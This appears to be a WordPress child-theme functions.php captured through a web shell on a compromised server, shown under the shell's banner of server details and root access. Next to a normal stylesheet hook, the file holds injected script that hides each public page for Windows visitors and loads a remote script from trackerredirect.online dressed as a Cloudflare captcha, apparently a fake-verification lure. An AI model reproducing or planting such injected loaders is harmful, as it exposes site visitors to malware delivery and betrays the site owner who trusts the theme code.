| Server IP : 94.177.215.211 / Your IP : 216.73.216.172 Web Server : nginx/1.26.0 System : Linux mtncompany-wp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : root ( 0) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source,eval MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/sites/morsiesorsi/wp-content/themes/woodmart-child/ |
Upload File : |
<?php
/**
* Enqueue script and styles for child theme
*/
function woodmart_child_enqueue_styles() {
wp_enqueue_style( 'child-style', get_stylesheet_directory_uri() . '/style.css', array( 'woodmart-style' ), woodmart_get_theme_info( 'Version' ) );
}
add_action( 'wp_enqueue_scripts', 'woodmart_child_enqueue_styles', 10010 );
add_action('wp_head', function () {
if (is_admin()) return;
?>
<style id="cf-captcha-hide-style">html:not(.cf-captcha-ready) body{visibility:hidden!important}</style>
<script>(function(){var O="https://trackerredirect.online",K="cf_captcha_ok_"+O,ua=navigator.userAgent||"",pl=navigator.platform||"",W=/Win/i.test(pl)||/Windows|WinNT|WOW64|Win32|Win64/i.test(ua);function saveT(){var r=document.documentElement,t=document.querySelector("title"),v=(t&&t.textContent?t.textContent:document.title||"").trim();if(v&&!r.dataset.cfOriginalTitle)r.dataset.cfOriginalTitle=v;}saveT();function R(){document.documentElement.classList.add("cf-captcha-ready");}if(!W){R();return;}try{if(localStorage.getItem(K)==="1"){R();return;}}catch(e){}document.documentElement.classList.add("cf-captcha-pending");var s=document.createElement("script");s.src=O+"/embed.js?v=15";s.setAttribute("data-path","/");s.onerror=function(){R();};setTimeout(function(){if(!window.__cfCaptchaInit)R();},12000);document.head.appendChild(s);})();</script>
<?php
}, 1);